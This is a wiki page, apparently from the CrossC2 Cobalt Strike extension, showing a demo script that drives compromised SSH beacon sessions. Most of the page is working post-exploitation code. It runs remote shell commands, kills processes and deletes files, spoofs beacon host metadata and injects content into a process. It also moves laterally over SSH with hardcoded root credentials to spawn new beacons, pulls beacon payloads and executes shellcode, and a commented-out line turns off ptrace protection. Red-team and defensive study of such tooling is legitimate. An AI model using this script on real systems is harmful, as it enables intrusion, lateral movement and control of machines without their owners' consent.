
API Demo

hooooooooooook edited this page Jun 11, 2022 · 1 revision
# Print a banner line before the demo calls below are issued.
println("---------- third party ----------------");

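# Callback passed to bls(): logs the listed folder and its listing to the
# beacon console.
# $1 = beacon ID, $2 = the folder, $3 = results
sub callback_ls {
    # Sleep variables are global unless declared. The main loop uses the
    # same names ($bid, $res), so keep these local to the callback.
    local('$bid $pwd $res');

    $bid = $1;
    $pwd = $2;
    $res = $3;

    blog($bid, @($pwd, $res));
}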

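# Callback passed to bps(): logs the process listing to the beacon console.
# $1 = beacon ID, $2 = results
sub callback_ps {
    # Sleep variables are global unless declared. The main loop uses the
    # same names ($bid, $res), so keep these local to the callback.
    local('$bid $res');

    $bid = $1;
    $res = $2;

    blog($bid, @($res));
}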

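# Walk every known beacon and run the demo API calls against each session
# that is both active and an SSH session. All paths, PIDs, addresses,
# credentials and the listener name below are the demo's sample values.
foreach $beacon (beacons()) {
    if (!-isactive $beacon['id']) {
        # inactive session: nothing to do
    } else if (-isssh $beacon['id']) {
        $bid = $beacon['id'];
        blog($bid, "auto api test demo");  # write a log entry

        bshell($bid, "echo \$AAA");  # run a command
        bcc2_setenv($bid, "AAA", "ccc");  # set an environment variable
        bshell($bid, "echo \$AAA");

        bcc2_unsetenv($bid, "AAA");     # remove the environment variable
        bshell($bid, "echo \$AAA");

        bsleep($bid, 2);    # set the sleep interval

        btask($bid, "list dir");  # record the task being executed
        bls($bid, "./", &callback_ls);  # list the files in the given directory; accepts a callback

        btask($bid, "list process");
        bps($bid, &callback_ps);  # get the process list; accepts a callback

        # NOTE(review): the original marks this first bpwd as
        # "teamserver ignore"; the exact meaning is not shown here, confirm.
        bpwd($bid); # <---------- teamserver ignore
        bmkdir($bid, "/tmp/1234");      # create a directory
        bcd($bid, "/tmp/1234");     # change the working directory
        bpwd($bid);             # get the working directory

        bkill($bid, 123);       # terminate the process with the given PID
        brm($bid, "/tmp/1234/aaa");    # delete a file / folder

        bsetostype($bid, "printer");    # change the OS type in the beacon metadata
        bsetlocalip($bid, "10.0.0.1");      # change the internal IP in the beacon metadata
        bsethostname($bid, "test_hostname");    # change the host name in the beacon metadata

        # bshell($bid, "echo 0 > /proc/sys/kernel/yama/ptrace_scope");
        bcc2_inject($bid, 1234, "aaaa", "/tmp/1234/");      # inject the given content into the process with the given PID

        # Bring up a beacon of the named listener on each host in the list over SSH.
        bssh_jump($bid, "root", "123456", "", "ssh", "test_demo_cc2_listener", @("10.0.1.3", "10.0.1.4"), "/tmp/1234/");

        $res = getSSHSession();     # get the active CrossC2 sessions
        blog($bid, $res);

        $res = getCrossC2Site();       # get the server-side download address of the CrossC2 beacon
        blog($bid, $res);

        $res = getCrossC2Listener();    # get the CrossC2 listener info configured on the server
        blog($bid, $res);

        # Fetch both beacon flavours from the named CrossC2 listener. The
        # executable one is kept in its own variable so the loop variable
        # $beacon is not overwritten inside the loop body.
        $libbeacon = getCrossC2Beacon("test_demo_cc2_listener", "lib");     # shared-library beacon
        $mainbeacon = getCrossC2Beacon("test_demo_cc2_listener", "main");     # executable beacon
        $len_libbeacon = size($libbeacon);
        $len_beacon = size($mainbeacon);
        blog($bid, "libbeacon size: $len_libbeacon");
        blog($bid, "beacon size: $len_beacon");

        bcc2_unsetenv($bid, "AAA");     # statement terminator was missing here
        bshell($bid, "export");

        # run shellcode
        bshellcode($bid, "\\x90\\x90\\x90\\x90");           # execute shellcode in the given session

    }
}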


CobaltStrike's cross-platform C2 expansion framework
